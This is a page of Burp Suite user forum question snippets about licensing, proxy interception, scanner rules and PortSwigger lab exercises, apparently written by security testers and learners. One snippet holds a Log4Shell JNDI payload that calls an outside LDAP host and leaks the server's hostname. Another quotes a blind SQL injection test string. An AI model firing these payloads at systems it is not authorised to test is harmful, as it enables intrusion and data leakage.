How do I? - Page 116 - Burp Suite User Forum

my license has been used many times now is not working

Hello Support team happy new year i need to disable the old license and generate a new one in order to disable the old devices over the cloud thanks

burp collab client - Wont work properly

Hi there, I need help enabling burp collab client to work correctly. I do the health check and am not sure how to fix the problems that arise and i dont see full solutions online.

Bad Request in Web Academy labs..!!!!

Hi all, I'm totally new to web security want to learn web security and I've found out portswigger web labs. this is my first day starting to learn about websec. but, when I tried to access my first lab as suggested by...

How do I know if https requests are failing to be decrypted?

I am attempting to mitm an android emulator on my computer with burpsuite. I am able to see https traffic of insecure things like assets, but I see no traffic for data being posted to and from the app, over https. I know the...

Scanner does not honor match/replace rules

I have added a log4j match/replace rule on the User-Agent like this Match: ^User-Agent.*$ Replace: User-Agent: \${jndi:ldap://log4shell.huntress.com:1389/hostname=\${env:HOSTNAME}/guid} The rule works just fine when...

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

Hello everyone! Im having troubles with this lab. I tried even to follow the youtube videos to get with the solution and not even that helps. Im getting a 400 and {"error":"Invalid request"} I tried also to switch...

Digest Auth in Burp was removed?

Hi, What happened with Digest authentication support? https://portswigger.net/burp/documentation/desktop/options/connections "Supported authentication types are: basic, NTLMv1, and NTLMv2" In the previous versions...

Any Solution to "Network Protocol Error" in Firefox while Using Burp!

Hi Guys, I've been seeing an error on some websites while using burp the error on firefox goes like --- Network Protocol Error An error occurred during a connection to target.com. The page you are trying to...

scanning ip ranges ?

Hello, given we have set of ip ranges to scan. how i can do with burp to set different ip ranges in the target scope ? can someone advise ?

Find and replace with $ sign in replace not working

I am attempting to use find and replace to replace the user agent string with a jndi payload. However the dollar sign in the replacement string causes the replacement not to work. For instance: Match:...

Stop scan

I need to stop scan on paticular GET/POST keyword. If web page says: "Error. Could not find..." I want previous GET/POST. To stop at that message.

Upgrade Burp Enterprise, Linux Distro

Would anyone have a link to detail the steps in upgrading Enterprise Edition within a Linux environment? My current version is; 2021.12.1-8680, Java version: 11.0.10 Any advice appreciated.

GraphQL mutation for extensions

Does graphql support mutations of a given site to add an extension?

Can my employer purchase the exam for me?

How can my employer purchase the exam for me? Don't you have something like a voucher system or can you email us a quotation?

Is there some different configurations required for intercepting Flutter and ARM based mobile application

I'm not able to intercept the traffic of the ARM android application, however i can clearly see traffic passing via wireshark. The application does not have ssl pinning and burp is properly configured with emulator as i'm...

Cannot access the web security lab

I can not access any lab on your website using Microsoft Edge. When i click "Access the lab", it shows the error message is "ERR_CONNECTION_TIMED_OUT". I tried another device and browser but they have the same issue. Can...

plaintext password

Hi there, if I capture a login request and view a password in plaintext form, would this indicate a vulnerability? Considering that if you capture it in some applications like facebook it will appear encrypted.

Scan DIV class

Hi! I need to scan just a part of web page - DIV class. This class is changing time to time, and I want to find how and when it changes. It shoud be random, but I don't think it is. For example, clock on web page changes...

Burp Pro isn't intercepting HTTP requests from Terminal

Hello, I am using Burp Pro and it doesn't intercept any HTTP request from Terminal on my macOS. Help me, please. Thank you.

Why simple quote is necessary in SQL Blind Injection using TrackingID?

I'm in first lab of Blindd SQL Injection and payload for test is: TrackingId=xyz' AND '1'='1 Why is necessary this quotes in '1' and '1?